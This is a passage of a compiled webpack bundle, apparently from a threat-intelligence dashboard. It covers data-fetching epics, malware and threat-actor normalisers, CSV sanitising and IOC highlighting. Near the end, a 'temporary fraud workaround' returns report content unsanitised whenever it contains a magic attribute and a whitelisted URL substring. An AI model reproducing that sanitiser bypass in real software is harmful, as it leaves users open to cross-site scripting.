var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _toConsumableArray(arr) { if (Array.isArray(arr)) { for (var i = 0, arr2 = Array(arr.length); i < arr.length; i++) { arr2[i] = arr[i]; } return arr2; } else { return Array.from(arr); } }






var debug = __WEBPACK_IMPORTED_MODULE_4_debug___default()('app:modules:insights:epics'); // eslint-disable-line no-unused-vars












/* GET requests w/ query params:
 *
 * ?enclave= (default: first enclave)
 * ?from= (default: 7)
 * ?to= (default: 0)
 * ?pageSize= (default: 10)
 * ?startPage= (default: 0)
 *
**/

var insightCategories = ['enclaveCorrelations', 'communityCorrelations', 'enclaveIoCs'];

var trendCategories = ['communityTrendingIocs', 'malware', 'cves'];

var categoryToEndpoint = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])({
  enclaveCorrelations: 'enclave-correlations',
  communityCorrelations: 'community-correlations',
  enclaveIoCs: 'iocs-correlations',
  communityTrendingIocs: 'community-trending-iocs',
  malware: 'malware-indicators',
  cves: 'cve-indicators'
});

var defaultRange = 3;

var generateDefaultRange = function generateDefaultRange() {

  var fromDate = new Date();
  fromDate.setDate(fromDate.getDate() - defaultRange);

  return {
    from: fromDate.getTime(),
    to: new Date().getTime()
  };
};

var createEndpoint = function createEndpoint(category) {
  var parameters = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {};


  var defaultDateRange = generateDefaultRange();

  var _parameters$enclave = parameters.enclave,
      enclave = _parameters$enclave === undefined ? '' : _parameters$enclave,
      _parameters$from = parameters.from,
      from = _parameters$from === undefined ? defaultDateRange.from : _parameters$from,
      _parameters$to = parameters.to,
      to = _parameters$to === undefined ? defaultDateRange.to : _parameters$to,
      _parameters$startPage = parameters.startPage,
      startPage = _parameters$startPage === undefined ? 0 : _parameters$startPage,
      _parameters$pageSize = parameters.pageSize,
      pageSize = _parameters$pageSize === undefined ? 10 : _parameters$pageSize,
      _parameters$refresh = parameters.refresh,
      refresh = _parameters$refresh === undefined ? false : _parameters$refresh;


  var baseURL = '/services/insights/' + categoryToEndpoint.get(category);
  var params = 'enclave=' + enclave + '&from=' + from + '&to=' + to + '&pageSize=' + pageSize + '&startPage=' + startPage + '&refresh=' + refresh.toString();

  return baseURL + '?' + params;
};

var fromJSON = function fromJSON(response) {
  return Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(response).update('data', function (d) {
    return d.get('items');
  }).update('status', function () {
    var s = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : null;
    return s;
  }).update('totalElements', function (e) {
    return e > 50 ? 50 : e;
  });
};

/**
 * Map over all the categories and fetch each
 *
 * NOTE: Whenever a report is removed we also fetch. This is how stale reports
 * (i.e. reports that no longer exist) get cleared out of insights data.
 *
 * NOTE: We made the explore view the default which means the dashboard will not
 * be shown on inital load (unless they deep link). Since the dashboard
 * currently takes a long time to load we're prefetching the data here.
 * However, since app initialization is a very busy time I want to deprioritize
 * this fetch. The 2s is arbitrary but should escape the heaviest thread usaeg
 * on initialization.
 *
 * requestIdleCallback is not supported in safari or Edge (let alone IE)
 * as of this writing. It also doesn't come build into Rx. So for now let's just
 * schedule on animation frame
 */
var initEpic = function initEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].merge(action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["b" /* FETCH_DASHBOARD */]) // See NOTE
  ).mergeMap(function (_ref2) {
    var payload = _ref2.payload;

    var savedDateRanges = Object(__WEBPACK_IMPORTED_MODULE_10_modules_insights_getters_js__["savedRanges"])(store.getState());
    var insights = savedDateRanges.get('insights');
    var trends = savedDateRanges.get('trends');
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([].concat(_toConsumableArray(insightCategories.map(function (category) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["c" /* FETCH_TIME_RANGE */],
        payload: _extends({ category: category, refresh: !!payload }, insights.toJS())
      };
    })), _toConsumableArray(trendCategories.map(function (category) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["c" /* FETCH_TIME_RANGE */],
        payload: _extends({ category: category, refresh: !!payload }, trends.toJS())
      };
    }))));
  });
};

/* Select a new enclave and re-fetch all categories */
var changeEnclaveEpic = function changeEnclaveEpic(action$, store, _ref3) {
  var ajax = _ref3.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["l" /* SELECT_ENCLAVE */]).mergeMap(function (_ref4) {
    var id = _ref4.payload.id;

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from(insightCategories.map(function (category) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["c" /* FETCH_TIME_RANGE */],
        payload: _extends({ category: category, enclave: id }, generateDefaultRange())
      };
    }));
  });
};

/* Sets new date range options, fetches based on selection */
var applyOptionsEpic = function applyOptionsEpic(action$, store, _ref5) {
  var ajax = _ref5.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["a" /* APPLY_OPTIONS */]).mergeMap(function () {
    var enclave = Object(__WEBPACK_IMPORTED_MODULE_10_modules_insights_getters_js__["enclaveSelection"])(store.getState()).get('enclaveId');
    var dateOptions = Object(__WEBPACK_IMPORTED_MODULE_11__getters_js__["currentTimeFilter"])(store.getState());
    var category = dateOptions.get('category');
    var daysBack = dateOptions.get('daysBack');

    var range = daysBack ? Object(__WEBPACK_IMPORTED_MODULE_13_trustar_utils_dashboard__["b" /* computeDateRangeDaySelection */])(daysBack) : {
      from: dateOptions.get('dateSince'),
      to: dateOptions.get('dateUntil')
    };

    var endpoints = void 0;

    switch (category) {
      case 'insights':
        endpoints = insightCategories;
        break;
      case 'trends':
        endpoints = trendCategories;
        break;
      default:
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
    }

    var actions = endpoints.map(function (category) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["c" /* FETCH_TIME_RANGE */],
        payload: _extends({ category: category, enclave: enclave }, range)
      };
    });

    if (category === 'insights') {
      actions.push({
        type: __WEBPACK_IMPORTED_MODULE_7_modules_metrics_action_types_js__["c" /* FETCH_UPDATED_TIME_RANGE */],
        payload: _extends({}, range)
      });
    }

    actions.push({
      type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["j" /* SAVE_DATE_RANGE */],
      payload: _extends({ category: category }, range)
    });

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from(actions);
  }).catch(function (err) {
    var status = err.status;
    // TODO_LOG
    //if (status !== 401 && status !== 403 && status !== 502) {
    //  Raven.captureException(
    //    new Error('An Error occurred in insights applyOptionsEpic.'),
    //    {extra: { error: err }}
    //  );
    //}

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from(categoryToEndpoint.keySeq().map(function (category) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["d" /* FETCH_TIME_RANGE_FAILURE */],
        payload: { category: category, err: err }
      };
    }));
  });
};

var fetchDateRangeEpic = function fetchDateRangeEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["c" /* FETCH_TIME_RANGE */]).mergeMap(function (_ref7) {
    var payload = _ref7.payload;
    var category = payload.category,
        from = payload.from,
        to = payload.to,
        enclave = payload.enclave,
        refresh = payload.refresh;

    var pageSize = void 0;
    if (Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["fromJS"])(trendCategories).toSet().has(category)) pageSize = 5;
    return ajax.get(createEndpoint(category, { from: from, to: to, enclave: enclave, pageSize: pageSize, refresh: refresh })).mergeMap(function (_ref8) {
      var response = _ref8.response;

      var data = fromJSON(response);
      var actions = [{
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["e" /* FETCH_TIME_RANGE_SUCCESS */],
        payload: { category: category, data: data }
      }];

      if (category === 'enclaveCorrelations') {
        actions.push({
          type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["n" /* SET_DEFAULT_ENCLAVE */],
          payload: data.get('enclave')
        });
      }

      if (category === 'enclaveCorrelations' && data.get('status') === 'NO_REPORTS') {
        actions.push(Object(__WEBPACK_IMPORTED_MODULE_5__actions_js__["setViewOptions"])({ category: 'communityTrendingIocs', panel: 'trends' }));
      }

      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from(actions);
    }).catch(function (err) {
      var status = err.status;

      var action = [{
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["d" /* FETCH_TIME_RANGE_FAILURE */],
        payload: { category: category, err: err }
      }];
      if (status === 403) {
        action.push(Object(__WEBPACK_IMPORTED_MODULE_12_modules_alerts_actions_js__["error"])('You do not have access to this enclave'));
      }
      // TODO_LOG
      //if (status !== 401
      //  && status !== 403
      //  && status !== 502
      //  && status !== 504) {
      //  Raven.captureException(
      //    new Error('An Error occurred in insights fetchDateRangeEpic.'),
      //    {extra: { error: err }}
      //  );
      //}
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from(action);
    });
  });
};

var paginateEpic = function paginateEpic(action$, store, _ref9) {
  var ajax = _ref9.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["f" /* PAGINATE */]).mergeMap(function (_ref10) {
    var _ref10$payload = _ref10.payload,
        category = _ref10$payload.category,
        parameters = _objectWithoutProperties(_ref10$payload, ['category']);

    var endpoint = createEndpoint(category, parameters);
    return ajax.get(endpoint).mergeMap(function (_ref11) {
      var response = _ref11.response;

      var result = fromJSON(response);
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["h" /* PAGINATE_SUCCESS */],
        payload: {
          category: category,
          meta: result.delete('data'),
          data: result.get('data')
        }
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["g" /* PAGINATE_FAILURE */], payload: { category: category, err: err } }, Object(__WEBPACK_IMPORTED_MODULE_12_modules_alerts_actions_js__["error"])('There was an error fetching additional results')]);
    });
  });
};

/* Determine which enclave the backend has selected and save it */
var setEnclaveEpic = function setEnclaveEpic(action$) {
  return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].zip(action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["n" /* SET_DEFAULT_ENCLAVE */]).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('payload')), action$.ofType(__WEBPACK_IMPORTED_MODULE_9_modules_profile_action_types_js__["f" /* FETCH_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('payload')), action$.ofType(__WEBPACK_IMPORTED_MODULE_8_modules_enclave_action_types_js__["f" /* FETCH_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["prop"])('payload'))).mergeMap(function (_ref12) {
    var _ref13 = _slicedToArray(_ref12, 3),
        id = _ref13[0],
        profile = _ref13[1],
        enclaves = _ref13[2];

    /* if user-preferences has a default enclave, select it here.
     * otherwise fall back to default enclave selection (alphabetical) */

    var defaultSelectedEnclaveId = profile.preferences ? profile.preferences.defaultEnclaveGuid : null;

    var defaultId = defaultSelectedEnclaveId ? defaultSelectedEnclaveId : id;

    var enclave = enclaves.find(function (e) {
      return e.id === defaultId;
    });
    if (!enclave || enclave.get('label') !== 'INTERNAL') {
      enclave = null;
    }

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_6__action_types_js__["k" /* SAVE_DEFAULT_ENCLAVE */],
      payload: {
        id: enclave ? enclave.id : null,
        name: enclave ? enclave.name : null
      }
    });
  });
};

/* Record user events for dashboard insights & trends clicks */
var analyticsEpic = function analyticsEpic(action$, store, _ref14) {
  var ajax = _ref14.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_6__action_types_js__["i" /* REGISTER_ACTIVITY */]).mergeMap(function (_ref15) {
    var _ref15$payload = _ref15.payload,
        id = _ref15$payload.id,
        panel = _ref15$payload.panel;

    var analyticsEndpoint = '/services/register-activity/';
    return ajax.post(analyticsEndpoint + ('?panel=' + panel + '&id=' + id)).ignoreElements().catch(function (err) {
      var status = err.status;
      // TODO_LOG if (status !== 401 && status !== 403 && status !== 502) {
      // TODO_LOG   Raven.captureException(
      // TODO_LOG     new Error('An error occurred hitting the register activity endpoint for the insights analyticsEpic.'),
      // TODO_LOG     {extra: { error: err }}
      // TODO_LOG   );
      // TODO_LOG }

      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_observable__["combineEpics"])(initEpic, changeEnclaveEpic, applyOptionsEpic, fetchDateRangeEpic, paginateEpic, setEnclaveEpic, analyticsEpic));

/***/ }),
/* 1321 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "registerActivity", function() { return registerActivity; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setDisplayOptions", function() { return setDisplayOptions; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(506);



var debug = __WEBPACK_IMPORTED_MODULE_0_debug___default()('app:modules:marketplace:actions'); // eslint-disable-line no-unused-vars



/**
 * Register Marketplace activty to APM event
 */
var registerActivity = function registerActivity(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* REGISTER_ACTIVITY */],
    payload: payload
  };
};

/**
 * Set display options. Determines sorting and filtering of Marketplace.
 * NOTE: These Display Options aggregate those from the data-feeds and subscriptions modules
 */
var setDisplayOptions = function setDisplayOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["b" /* SET_DISPLAY_OPTIONS */],
    payload: options
  };
};

/***/ }),
/* 1322 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return REGISTER_APM_ENDPOINT; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return APM_EVENT_TYPE; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return marketplaceApmParams; });
var REGISTER_APM_ENDPOINT = '/services/apm';
var APM_EVENT_TYPE = 'INDICATOR_CLICKED';

var marketplaceApmParams = {
  eventType: 'MARKETPLACE_QUERY'
};

/***/ }),
/* 1323 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "MALWARE_ENDPOINT", function() { return MALWARE_ENDPOINT; });
var MALWARE_ENDPOINT = '/services/malware';

/***/ }),
/* 1324 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "normalizeMalware", function() { return normalizeMalware; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "normalizeAliases", function() { return normalizeAliases; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


/* Remove special characters from Malware terms */
var normalizeText = function normalizeText(text) {
  return text.replace(/%s/g, ' ').replace(/\\/g, '');
};

/* Normalizes Malware text and converts Aliases to a List */
var normalizeMalware = function normalizeMalware(malware) {
  return malware.has('aliases') ? malware.update('aliases', function (a) {
    return a.toList().map(normalizeText);
  }) : malware.set('aliases', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()).update('name', function (n) {
    return normalizeText(n);
  });
};

/* Normalize Malware aliases from a List to a comma-separated-string
 * for rendering */
var normalizeAliases = function normalizeAliases(aliases) {
  var aliasString = aliases.toArray().join(', ');
  return aliasString ? aliasString : '(no aliases)';
};

/***/ }),
/* 1325 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "THREAT_ACTOR_ENDPOINT", function() { return THREAT_ACTOR_ENDPOINT; });
var THREAT_ACTOR_ENDPOINT = '/services/threat-actors';

/***/ }),
/* 1326 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "normalizeThreatActor", function() { return normalizeThreatActor; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "normalizeAliases", function() { return normalizeAliases; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


/* Remove special characters from Threat Actor terms */
var normalizeText = function normalizeText(text) {
  return text.replace(/%s/g, ' ').replace(/\\/g, '');
};

/* Normalizes Threat Actor text and converts Aliases to a List */
var normalizeThreatActor = function normalizeThreatActor(threatActor) {
  return threatActor.has('aliases') ? threatActor.update('aliases', function (a) {
    return a.toList().map(normalizeText);
  }) : threatActor.set('aliases', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()).update('name', function (n) {
    return normalizeText(n);
  });
};

/* Normalize Threat Actor aliases from a List to a comma-separated-string
 * for rendering */
var normalizeAliases = function normalizeAliases(aliases) {
  var aliasString = aliases.toArray().join(', ');
  return aliasString ? aliasString : '(no aliases)';
};

/***/ }),
/* 1327 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(2951);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "actions", function() { return __WEBPACK_IMPORTED_MODULE_0__actions_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(2952);
/* harmony reexport (module object) */ __webpack_require__.d(__webpack_exports__, "getters", function() { return __WEBPACK_IMPORTED_MODULE_1__getters_js__; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2953);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "default", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2954);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "epic", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 1328 */,
/* 1329 */,
/* 1330 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return sanitizeCsvFields; });
/**
 * Sanitizes a CSV string by prefixing every value with a non-printable character.
 */
var sanitizeCsvFields = function sanitizeCsvFields(csvString) {
  if (!csvString) {
    return '';
  }

  var NON_PRINTABLE_CHARACTER = '\b';
  var rows = csvString.split('\n');
  var sanitizedRows = rows.map(function (row) {
    var values = row.split(',');
    var sanitizedValues = values.map(function (value) {
      var preformattedValue = value.replace(/\"/g, '');

      return '' + NON_PRINTABLE_CHARACTER + preformattedValue;
    });

    return sanitizedValues.join(',');
  });

  return sanitizedRows.join('\n');
};

/***/ }),
/* 1331 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export exactMatchReplace */
/* unused harmony export matchReplaceFullWordsRegular */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return getReportIndicators; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return matchIOCsRegular; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return matchIOCsJSON; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return parseJsonIfPossible; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return parseAndSanitizeJsonToHtml; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_lodash_escaperegexp__ = __webpack_require__(123);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_lodash_escaperegexp___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_lodash_escaperegexp__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_string_replace__ = __webpack_require__(727);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_string_replace___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_react_string_replace__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_sanitize_html__ = __webpack_require__(728);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_sanitize_html___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_sanitize_html__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__defang_js__ = __webpack_require__(1304);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_constellation_types_js__ = __webpack_require__(880);
var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; };









// A sorter function for strings
var longestFirst = function longestFirst(a, b) {
  var lengthA = a.length;
  var lengthB = b.length;

  if (lengthA === lengthB) {
    return 0;
  } else if (lengthA > lengthB) {
    return -1;
  } else {
    return 1;
  }
};

/* Construct regexes to match indicators */
var addDefangedIndicators = function addDefangedIndicators(indicators) {
  return indicators.map(function (x) {
    switch (x.get('indicatorType')) {
      case 'IP':
      case 'URL':
      case 'EMAIL_ADDRESS':
        return Object(__WEBPACK_IMPORTED_MODULE_5__defang_js__["b" /* escapeDefangRegex */])(x.get('value'));
      default:
        return __WEBPACK_IMPORTED_MODULE_0_lodash_escaperegexp___default()(x.get('value'));
    }
  });
};

/* Replace literal whitespace with a regex matcher so we can
 * catch 'this that' as well as 'this     that' */
var wordsToRegString = Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["pipe"])(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["map"])(Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["replace"])(/\s+?/, '\\s+?')), Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["sort"])(longestFirst), Object(__WEBPACK_IMPORTED_MODULE_3_ramda__["join"])('|'));

/**
 * Exported for testing
 */
var exactMatchReplace = function exactMatchReplace(str, re, replacer) {
  return str.replace(re, function (fullMatch, exactMatch) {
    return fullMatch.replace(exactMatch, replacer(exactMatch));
  });
};

var matchReplaceFullWordsRegular = function matchReplaceFullWordsRegular(str, words, replacer) {
  // Step 1: Build a regex from all words. The (?:\\s|\\b) will match whitespace
  // orword boundaries like periods (\b). So this will not match word
  // substrings, but it will match words surrounded by whitespace or boundaries.
  // I.e. match 'trustar' and 'my_company' in
  //     'extract trustar and my_company. But not trustartech.'
  //  -> 'extract <MATCH> and <MATCH>. But not trustartech.'
  var regex = new RegExp('(?:\\s|\\b)(' + wordsToRegString(words) + ')(?:\\s|\\b)', 'gmi');

  // Step 2: Do the actual replacement with the regex. This step just marks off
  // words in a way that will make them matchable by react string replace.
  // Ultimately the need for two steps comes from the fact that
  // reactStringReplace uses str.split under the hood, and using split with
  // regex will happily strip everything in the regex that's not part of the
  // match group. We don't want to stip the whitespace and boundaries in the
  // original regex, so we replace them with something we DO want stripped and
  // use that in react string replace. These `<@@__@@>` tags are arbitrary. Just
  // something unlikely to appear on any text on its own.
  var _tmp = exactMatchReplace(str, regex, function (x) {
    return '<@@__@@>' + x + '</@@__@@>';
  });

  // Step 3: Finally use the intermediate string to run the replacement,
  // stripping out the custom replacement tags we inserted in step 2.
  var result = __WEBPACK_IMPORTED_MODULE_2_react_string_replace___default()(_tmp, /<@@__@@>([\s\S]+?)<\/@@__@@>/gmi, replacer);

  // Store the constructed regex for debugging purposes. Only in dev b/c
  // otherwise we might run into hard to track down memory leaks and it can
  // cause test failures. I.e. jest will find two arrays inequal (deep compare)
  // if we have this _regex prop trailing off the array. However, the test
  // runner doesn't display anything b/c this is just a rogue prop on an array
  if (false) {
    result._regex = regex;
  }

  return result;
};

var matchReplaceFullWordsJSON = function matchReplaceFullWordsJSON(str, words) {
  var regex = new RegExp('(?:\\s|\\b)(' + wordsToRegString(words) + ')(?:\\s|\\b)', 'gmi');
  return exactMatchReplace(str, regex, function (x) {
    return '<span style=\'color: #60b044;\'\'>' + x + '</span>';
  });
};

var getReportIndicators = function getReportIndicators(indicators) {
  var indicatorTypes = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(__WEBPACK_IMPORTED_MODULE_6_trustar_constellation_types_js__["d" /* INDICATOR_TYPES */]).keySeq();
  return indicators.filter(function (x) {
    return indicatorTypes.contains(x.get('indicatorType'));
  });
};

var createMatchers = function createMatchers(indicators) {
  return addDefangedIndicators(indicators).toJS();
};

/* NOTE:
 *
 * There are two paths for matching and extracting IOCs:
 *
 * The traditional path where we match and extract using react-string-replace is the first.
 * The second 'simple' option is used for highlighting a formated JSON structure and
 * replaces matched terms with <span> HTML and returns ordinary strings.
 *
 * Report.js uses one path or the other based on the report in question.
 *
 * The first extraction method is a known performance bottleneck for reports with
 * high numbers of IOCs.
 *
 */

var matchIOCsRegular = function matchIOCsRegular(text, indicators, replacer) {
  var matchers = createMatchers(indicators);
  var highlightedText = text;
  if (matchers.length > 0) {
    highlightedText = matchReplaceFullWordsRegular(text, matchers, replacer);
  }
  return highlightedText;
};

var matchIOCsJSON = function matchIOCsJSON(text, indicators) {
  var matchers = createMatchers(indicators);
  var highlightedText = text;
  if (matchers.length > 0) {
    highlightedText = matchReplaceFullWordsJSON(text, matchers);
  }
  return highlightedText;
};

/* Determine if a report body is a valid JSON structure */
var parseJsonIfPossible = function parseJsonIfPossible(content) {
  var parsed = void 0;
  try {
    parsed = JSON.parse(content);
    return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({ valid: true, parsed: parsed });
  } catch (e) {
    return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({ valid: false, parsed: parsed });
  }
};

var isTerminalValue = function isTerminalValue(value) {
  if (value === null || typeof value === 'string' || typeof value === 'number' || typeof value === 'boolean') {
    return true;
  }
};

/* NOTE: We override the default options for sanitize-html for a tags.
 * For a tags, we transform by stringifying the entire tag and attributes. */
var sanitizeOptions = function sanitizeOptions(content) {
  return {
    allowedTags: ['h3', 'h4', 'h5', 'h6', 'blockquote', 'p', 'ul', 'ol', 'nl', 'li', 'b', 'i', 'strong', 'em', 'strike', 'code', 'hr', 'br', 'div', 'table', 'thead', 'caption', 'tbody', 'tr', 'th', 'td', 'pre'],
    allowedAttributes: [],
    transformTags: {
      a: function a(tagName, attributes) {
        /* sanitize all a tags to plain text */
        return {
          tagName: 'a',
          text: JSON.stringify(content)
        };
      }
    }
  };
};

/* NOTE: Code for Temporary Fraud Workaround:
 * ************************************************************************************ */

/* Arbitrary HTML attribute to identify fraud links */
var arbitraryFraudAttribute = '@@_allowCustomFraudLink';
/* Hardcoded set of fraud URL patterns to whitelisted a tags in report content */
var arbitraryFraudWhitelistPatterns = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Set"])(['https://www.google.com/search?q=', 'https://www.google.com/', 'https://crunchbase.com/textsearch?q=', 'https://www.crunchbase.com/', 'https://www.linkedin.com/search/results/people/?keywords=', 'https://www.linkedin.com/', 'https://twitter.com/search?q=', 'https://www.twitter.com/', 'https://internal.softlayer.com/']);

/* NOTE: Content must contain one of the above URL patterns and the
 * arbitrary fraud attribute to be whitelisted */
var shouldWhitelistForFraud = function shouldWhitelistForFraud(content) {
  if (typeof content !== 'string') return false; // safeguard against non-string values, e.g. booleans, or null
  if (!content.includes(arbitraryFraudAttribute)) return false;
  return arbitraryFraudWhitelistPatterns.some(function (url) {
    return content.includes(url);
  });
};

/* ************************************************************************************** */

/* Apply custom defaults to HTML sanitization */
var safelyParseContent = function safelyParseContent(content) {
  return shouldWhitelistForFraud(content) ? content // if it passes fraud screen, simply provide content directly. Otherwise sanitize:
  : __WEBPACK_IMPORTED_MODULE_4_sanitize_html___default()(content, sanitizeOptions(content));
};

// Nesting threshold;
var threshold = 6;
/* Recursively turn arbitrary JSON structure into nested human-readable HTML ༼ つ ▀̿_▀̿ ༽つ */
var parseAndSanitizeJsonToHtml = function parseAndSanitizeJsonToHtml(blob) {
